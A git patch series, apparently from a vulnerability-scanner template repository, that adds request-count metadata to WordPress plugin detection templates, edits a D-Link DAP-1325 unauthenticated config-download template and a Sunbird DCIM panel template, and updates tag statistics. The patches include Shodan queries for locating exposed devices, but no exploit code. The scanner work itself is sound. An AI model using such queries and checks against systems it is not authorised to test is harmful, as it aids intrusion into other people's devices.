a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 6f0e0b1b9241a40261f1f7bcfaa5be379272e6c6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 8 Jul 2023 12:22:18 +0530 Subject: [PATCH 531/609] fix reference --- http/misconfiguration/d-link-auth-bypass.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/misconfiguration/d-link-auth-bypass.yaml b/http/misconfiguration/d-link-auth-bypass.yaml index cdc9213451..9e81457ecf 100644 --- a/http/misconfiguration/d-link-auth-bypass.yaml +++ b/http/misconfiguration/d-link-auth-bypass.yaml @@ -1,18 +1,18 @@ id: d-link-auth-bypass info: - name: D-Link DAP-1325 - Authentication Bypass + name: D-Link DAP-1325 - Broken Access Control author: gy741 severity: critical description: | Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-287 reference: - https://www.exploit-db.com/exploits/51556 - tags: config,dump,dlink,unauth + - https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 + metadata: + max-request: 1 + shodan-query: title:"D-LINK" + tags: config,dump,dlink,auth-bypass http: - method: GET From e2248067c8cccecd0b2ede9c75e774a0c8d5dc63 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 8 Jul 2023 12:26:41 +0530 Subject: [PATCH 532/609] change to favicon --- http/exposed-panels/sunbird-dcim-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/sunbird-dcim-panel.yaml b/http/exposed-panels/sunbird-dcim-panel.yaml index 2390562708..adf5753d36 100644 --- a/http/exposed-panels/sunbird-dcim-panel.yaml +++ b/http/exposed-panels/sunbird-dcim-panel.yaml @@ -11,7 +11,8 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - shodan-query: html.title:"dcTrack - Operations" + shodan-query: http.favicon.hash:781922099 + verified: true tags: sunbird,panel,login http: From 51c3c4bc08669247b00a1a08698baf8b42c9e1d9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 07:14:56 +0000 Subject: [PATCH 533/609] Auto Generated Templates Stats [Sat Jul 8 07:14:56 UTC 2023] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 6859 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 3461 insertions(+), 3418 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index a240e65b7d..5592f6b22e 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1908},{"name":"panel","count":909},{"name":"wordpress","count":787},{"name":"exposure","count":692},{"name":"wp-plugin","count":678},{"name":"xss","count":660},{"name":"osint","count":652},{"name":"tech","count":614},{"name":"edb","count":597},{"name":"lfi","count":557},{"name":"cve2021","count":434},{"name":"rce","count":427},{"name":"cve2022","count":401},{"name":"packetstorm","count":369},{"name":"wpscan","count":348},{"name":"misconfig","count":305},{"name":"wp","count":291},{"name":"unauth","count":272},{"name":"token-spray","count":240},{"name":"cve2020","count":237},{"name":"top-200","count":208},{"name":"osint-social","count":207},{"name":"authenticated","count":204},{"name":"sqli","count":203},{"name":"kev","count":200},{"name":"config","count":195},{"name":"","count":194},{"name":"oast","count":169},{"name":"token","count":157},{"name":"apache","count":151},{"name":"cve2018","count":150},{"name":"iot","count":149},{"name":"cve2019","count":148},{"name":"default-login","count":147},{"name":"joomla","count":136},{"name":"file","count":135},{"name":"login","count":130},{"name":"redirect","count":115},{"name":"cve2010","count":112},{"name":"top-100","count":100},{"name":"files","count":100},{"name":"cve2023","count":99},{"name":"router","count":97},{"name":"network","count":96},{"name":"ssrf","count":96},{"name":"cms","count":95},{"name":"auth-bypass","count":79},{"name":"cve2017","count":77},{"name":"devops","count":77},{"name":"takeover","count":73},{"name":"intrusive","count":72},{"name":"install","count":70},{"name":"disclosure","count":68},{"name":"oracle","count":65},{"name":"seclists","count":60},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"cisco","count":53},{"name":"google","count":53},{"name":"cve2016","count":52},{"name":"detect","count":51},{"name":"adobe","count":50},{"name":"fileupload","count":50},{"name":"tenable","count":46},{"name":"logs","count":46},{"name":"atlassian","count":45},{"name":"osint-gaming","count":45},{"name":"vmware","count":45},{"name":"aem","count":44},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"plugin","count":43},{"name":"cve2014","count":42},{"name":"hackerone","count":42},{"name":"osint-hobby","count":42},{"name":"osint-porn","count":42},{"name":"huntr","count":40},{"name":"generic","count":37},{"name":"traversal","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"kubernetes","count":35},{"name":"aws","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":34},{"name":"listing","count":33},{"name":"deserialization","count":31},{"name":"osint-coding","count":29},{"name":"sap","count":29},{"name":"osint-tech","count":28},{"name":"log4j","count":28},{"name":"cnvd","count":28},{"name":"gitlab","count":27},{"name":"misc","count":26},{"name":"php","count":26},{"name":"microsoft","count":26},{"name":"fuzz","count":25},{"name":"proxy","count":25},{"name":"jndi","count":25},{"name":"osint-business","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"cve2012","count":24},{"name":"api","count":24},{"name":"manageengine","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"amazon","count":23},{"name":"k8s","count":23},{"name":"zoho","count":23},{"name":"wp-theme","count":22},{"name":"c2","count":21},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"cloud","count":21},{"name":"tomcat","count":21},{"name":"ibm","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"jenkins","count":19},{"name":"dns","count":19},{"name":"camera","count":19},{"name":"dlink","count":19},{"name":"ssl","count":19},{"name":"struts","count":19},{"name":"github","count":19},{"name":"admin","count":18},{"name":"wavlink","count":18},{"name":"osint-music","count":18},{"name":"ftp","count":18},{"name":"service","count":18},{"name":"lfr","count":18},{"name":"ir","count":17},{"name":"cve2011","count":17},{"name":"xxe","count":16},{"name":"nginx","count":16},{"name":"printer","count":16},{"name":"cve2009","count":16},{"name":"backup","count":16},{"name":"osint-blog","count":16},{"name":"hp","count":15},{"name":"android","count":15},{"name":"status","count":15},{"name":"citrix","count":15},{"name":"magento","count":15},{"name":"cve2008","count":15},{"name":"osint-health","count":14},{"name":"woocommerce","count":14},{"name":"java","count":14},{"name":"jboss","count":14},{"name":"osint-art","count":14},{"name":"audit","count":14},{"name":"confluence","count":14},{"name":"nodejs","count":14},{"name":"cve2013","count":14},{"name":"zyxel","count":14},{"name":"mail","count":14},{"name":"domainmod","count":14},{"name":"creds-stuffing","count":13},{"name":"login-check","count":13},{"name":"azure","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"osint-dating","count":13},{"name":"cuppa","count":13},{"name":"fortigate","count":13},{"name":"laravel","count":13},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"grafana","count":12},{"name":"ruby","count":12},{"name":"enum","count":12},{"name":"git","count":12},{"name":"webserver","count":12},{"name":"auth","count":12},{"name":"vpn","count":12},{"name":"microweber","count":12},{"name":"rails","count":12},{"name":"dashboard","count":12},{"name":"backdoor","count":12},{"name":"drupal","count":12},{"name":"graphql","count":12},{"name":"netgear","count":12},{"name":"kafka","count":12},{"name":"airflow","count":12},{"name":"cnvd2021","count":11},{"name":"phpmyadmin","count":11},{"name":"online-fire-reporting","count":11},{"name":"xstream","count":11},{"name":"setup","count":11},{"name":"sonicwall","count":11},{"name":"osint-video","count":11},{"name":"docker","count":11},{"name":"cisa","count":11},{"name":"npm","count":11},{"name":"coldfusion","count":11},{"name":"digitalocean","count":10},{"name":"ssti","count":10},{"name":"glpi","count":10},{"name":"zimbra","count":10},{"name":"headless","count":10},{"name":"symfony","count":10},{"name":"spring","count":10},{"name":"ssh","count":10},{"name":"dell","count":10},{"name":"db","count":10},{"name":"dedecms","count":10},{"name":"solarview","count":10},{"name":"bypass","count":10},{"name":"django","count":10},{"name":"jolokia","count":10},{"name":"firebase","count":9},{"name":"kube","count":9},{"name":"windows","count":9},{"name":"fastjson","count":9},{"name":"sitecore","count":9},{"name":"scada","count":9},{"name":"gitea","count":9},{"name":"vcenter","count":9},{"name":"zabbix","count":9},{"name":"thinkphp","count":9},{"name":"redis","count":9},{"name":"iis","count":9},{"name":"opencats","count":9},{"name":"cache","count":9},{"name":"wso2","count":9},{"name":"versa","count":9},{"name":"prometheus","count":9},{"name":"installer","count":9},{"name":"osint-news","count":9},{"name":"pfsense","count":9},{"name":"ecology","count":8},{"name":"cisco-switch","count":8},{"name":"console","count":8},{"name":"hms","count":8},{"name":"exchange","count":8},{"name":"ognl","count":8},{"name":"mirai","count":8},{"name":"druid","count":8},{"name":"atom","count":8},{"name":"vbulletin","count":8},{"name":"config-audit","count":8},{"name":"spotweb","count":8},{"name":"recon","count":8},{"name":"icewarp","count":8},{"name":"solr","count":8},{"name":"metadata","count":8},{"name":"unauthenticated","count":8},{"name":"emerge","count":8},{"name":"elasticsearch","count":8},{"name":"default-page","count":8},{"name":"jetbrains","count":8},{"name":"crlf","count":8},{"name":"cnvd2020","count":8},{"name":"bucket","count":8},{"name":"oauth","count":8},{"name":"smtp","count":8},{"name":"odoo","count":7},{"name":"malware","count":7},{"name":"manager","count":7},{"name":"samsung","count":7},{"name":"seeyon","count":7},{"name":"nagios","count":7},{"name":"sophos","count":7},{"name":"fortios","count":7},{"name":"shopify","count":7},{"name":"go","count":7},{"name":"maps","count":7},{"name":"squirrelmail","count":7},{"name":"error","count":7},{"name":"avtech","count":7},{"name":"vms","count":7},{"name":"nagiosxi","count":7},{"name":"gogs","count":7},{"name":"ofbiz","count":7},{"name":"websphere","count":7},{"name":"ec2","count":7},{"name":"blind","count":7},{"name":"huawei","count":7},{"name":"activemq","count":6},{"name":"python","count":6},{"name":"magmi","count":6},{"name":"mongodb","count":6},{"name":"opensis","count":6},{"name":"nexus","count":6},{"name":"jeecg","count":6},{"name":"artica","count":6},{"name":"leak","count":6},{"name":"rconfig","count":6},{"name":"doctor-appointment-system","count":6},{"name":"s3","count":6},{"name":"cobbler","count":6},{"name":"elfinder","count":6},{"name":"filemanager","count":6},{"name":"keycloak","count":6},{"name":"lucee","count":6},{"name":"microstrategy","count":6},{"name":"liferay","count":6},{"name":"plesk","count":6},{"name":"kubelet","count":6},{"name":"minio","count":6},{"name":"bigip","count":6},{"name":"database","count":6},{"name":"moodle","count":6},{"name":"pmb","count":6},{"name":"newrelic","count":6},{"name":"fpd","count":6},{"name":"openvpn","count":6},{"name":"jetty","count":6},{"name":"zhiyuan","count":6},{"name":"jamf","count":6},{"name":"node","count":6},{"name":"slack","count":6},{"name":"symantec","count":6},{"name":"solarwinds","count":6},{"name":"prestashop","count":5},{"name":"firmware","count":5},{"name":"elastic","count":5},{"name":"adminer","count":5},{"name":"metinfo","count":5},{"name":"storage","count":5},{"name":"kkfileview","count":5},{"name":"nacos","count":5},{"name":"cacti","count":5},{"name":"hybris","count":5},{"name":"parallels","count":5},{"name":"alibaba","count":5},{"name":"fatpipe","count":5},{"name":"avideo","count":5},{"name":"caucho","count":5},{"name":"tikiwiki","count":5},{"name":"resin","count":5},{"name":"typo3","count":5},{"name":"rseenet","count":5},{"name":"paypal","count":5},{"name":"cockpit","count":5},{"name":"hikvision","count":5},{"name":"ruckus","count":5},{"name":"openemr","count":5},{"name":"rfi","count":5},{"name":"microfocus","count":5},{"name":"square","count":5},{"name":"heroku","count":5},{"name":"apisix","count":5},{"name":"circarlife","count":5},{"name":"carrental","count":5},{"name":"74cms","count":5},{"name":"gocd","count":5},{"name":"server","count":5},{"name":"sql","count":5},{"name":"geoserver","count":5},{"name":"awstats","count":5},{"name":"vrealize","count":5},{"name":"avaya","count":5},{"name":"strapi","count":5},{"name":"facebook","count":5},{"name":"hashicorp","count":5},{"name":"akamai","count":5},{"name":"webmin","count":4},{"name":"stored","count":4},{"name":"postmessage","count":4},{"name":"mysql","count":4},{"name":"seagate","count":4},{"name":"kevinlab","count":4},{"name":"hoteldruid","count":4},{"name":"tokens","count":4},{"name":"sangfor","count":4},{"name":"churchcrm","count":4},{"name":"ebs","count":4},{"name":"mostra","count":4},{"name":"kibana","count":4},{"name":"oa","count":4},{"name":"zend","count":4},{"name":"telerik","count":4},{"name":"springcloud","count":4},{"name":"jellyfin","count":4},{"name":"age-encryption","count":4},{"name":"cve2005","count":4},{"name":"phppgadmin","count":4},{"name":"aspose","count":4},{"name":"pixie","count":4},{"name":"powerjob","count":4},{"name":"log","count":4},{"name":"newstatpress","count":4},{"name":"umbraco","count":4},{"name":"mostracms","count":4},{"name":"osint-archived","count":4},{"name":"horde","count":4},{"name":"express","count":4},{"name":"gnuboard","count":4},{"name":"goanywhere","count":4},{"name":"dolibarr","count":4},{"name":"cve2007","count":4},{"name":"tenda","count":4},{"name":"redmine","count":4},{"name":"kentico","count":4},{"name":"openfire","count":4},{"name":"flink","count":4},{"name":"pie-register","count":4},{"name":"httpserver","count":4},{"name":"wcs","count":4},{"name":"tls","count":4},{"name":"ldap","count":4},{"name":"photo","count":4},{"name":"panos","count":4},{"name":"cloudflare","count":4},{"name":"candidats","count":4},{"name":"rabbitmq","count":4},{"name":"hpe","count":4},{"name":"sendgrid","count":4},{"name":"search","count":4},{"name":"javascript","count":4},{"name":"puppet","count":4},{"name":"axigen","count":4},{"name":"hongdian","count":4},{"name":"sonarqube","count":4},{"name":"beyondtrust","count":4},{"name":"phpinfo","count":4},{"name":"consul","count":4},{"name":"dropbear","count":4},{"name":"spark","count":4},{"name":"aura","count":4},{"name":"ampache","count":4},{"name":"couchdb","count":4},{"name":"ems","count":4},{"name":"elementor","count":4},{"name":"mikrotik","count":4},{"name":"mautic","count":4},{"name":"centos","count":4},{"name":"arcgis","count":4},{"name":"xmlrpc","count":4},{"name":"pentaho","count":4},{"name":"voip","count":4},{"name":"grav","count":4},{"name":"concrete","count":4},{"name":"zte","count":4},{"name":"cnvd2019","count":4},{"name":"httpd","count":4},{"name":"bitbucket","count":4},{"name":"prtg","count":4},{"name":"terramaster","count":4},{"name":"mailchimp","count":4},{"name":"artifactory","count":4},{"name":"jupyter","count":4},{"name":"codeigniter","count":4},{"name":"bmc","count":4},{"name":"roxy","count":4},{"name":"royalevent","count":4},{"name":"asp","count":4},{"name":"mlflow","count":4},{"name":"telesquare","count":4},{"name":"froxlor","count":4},{"name":"stripe","count":4},{"name":"yeswiki","count":4},{"name":"thinkcmf","count":4},{"name":"nosqli","count":4},{"name":"linkerd","count":4},{"name":"nextjs","count":4},{"name":"pypi","count":3},{"name":"magnolia","count":3},{"name":"processwire","count":3},{"name":"ueditor","count":3},{"name":"openai","count":3},{"name":"tableau","count":3},{"name":"selea","count":3},{"name":"graph","count":3},{"name":"sftp","count":3},{"name":"eshop","count":3},{"name":"asus","count":3},{"name":"mailgun","count":3},{"name":"ansible","count":3},{"name":"carel","count":3},{"name":"fuelcms","count":3},{"name":"waf","count":3},{"name":"finecms","count":3},{"name":"credential","count":3},{"name":"payara","count":3},{"name":"httpbin","count":3},{"name":"fanwei","count":3},{"name":"selenium","count":3},{"name":"subrion","count":3},{"name":"zeroshell","count":3},{"name":"superadmin","count":3},{"name":"webalizer","count":3},{"name":"twitter","count":3},{"name":"geowebserver","count":3},{"name":"splunk","count":3},{"name":"messaging","count":3},{"name":"mantisbt","count":3},{"name":"circleci","count":3},{"name":"backdrop","count":3},{"name":"teamcity","count":3},{"name":"aptus","count":3},{"name":"bitrix","count":3},{"name":"targa","count":3},{"name":"mcafee","count":3},{"name":"telegram","count":3},{"name":"forum","count":3},{"name":"axway","count":3},{"name":"rocketchat","count":3},{"name":"hsphere","count":3},{"name":"metersphere","count":3},{"name":"yonyou","count":3},{"name":"mobileiron","count":3},{"name":"nuuo","count":3},{"name":"weiphp","count":3},{"name":"lighttpd","count":3},{"name":"sharepoint","count":3},{"name":"openam","count":3},{"name":"labkey","count":3},{"name":"axis","count":3},{"name":"discourse","count":3},{"name":"aria","count":3},{"name":"rancher","count":3},{"name":"webmail","count":3},{"name":"segment","count":3},{"name":"drawio","count":3},{"name":"sentry","count":3},{"name":"r-seenet","count":3},{"name":"movable","count":3},{"name":"webcam","count":3},{"name":"webadmin","count":3},{"name":"pega","count":3},{"name":"empirecms","count":3},{"name":"trixbox","count":3},{"name":"a